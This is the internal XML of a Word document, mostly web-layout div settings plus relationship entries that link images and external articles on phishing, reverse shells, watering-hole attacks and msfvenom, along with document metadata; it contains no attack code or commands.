                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11480128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896">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148012897">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1148012892">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1148012916">
              <w:marLeft w:val="451"/>
              <w:marRight w:val="451"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1148012908">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1148012907">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="11480128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48012900">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148012901">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148012910">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148012911">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1148012912">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1148012913">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1148012902">
              <w:marLeft w:val="263"/>
              <w:marRight w:val="263"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1148012894">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11480129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48012914">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1161889057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1296981482">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1314799981">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1333148208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="228881521">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="263731799">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="838227979">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1026949687">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="19632269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59043663">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1460150297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1573005921">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1655600768">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="923758520">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="486166491">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="690498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5891720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="27141905">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1561476957">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1587230148">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="782385469">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="929503835">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="920988972">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="274292937">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="8081367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92561421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1359163912">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="562640665">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1461066921">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="390662895">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="20951311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2094557">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="243800972">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1803502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5309525">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="231158730">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="591815675">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="690880775">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1988898827">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="10394044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1766167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1985502041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2072848977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="275645907">
          <w:marLeft w:val="480"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="5772043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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.phishing.org/phishing-techniques" TargetMode="External"/><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hyperlink" Target="https://www.netsparker.com/blog/web-security/understanding-reverse-shells/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://searchsecurity.techtarget.com/definition/watering-hole-attack" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSetting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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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hyperlink" Target="https://www.rapid7.com/blog/post/2011/05/24/introducing-msfveno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10C11DA4-92A5-47D3-9D3D-E7AB3155267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157</TotalTime>
  <Pages>15</Pages>
  <Words>2011</Words>
  <Characters>11465</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>95</Lines>
  <Paragraphs>26</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>1</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Johnson &amp; Johnson</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13450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creator>McNeil Consumer Products Company</dc:creator>
  <cp:lastModifiedBy>Scott Finlon</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2011-03-30T20:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-14T04:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-15T03:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>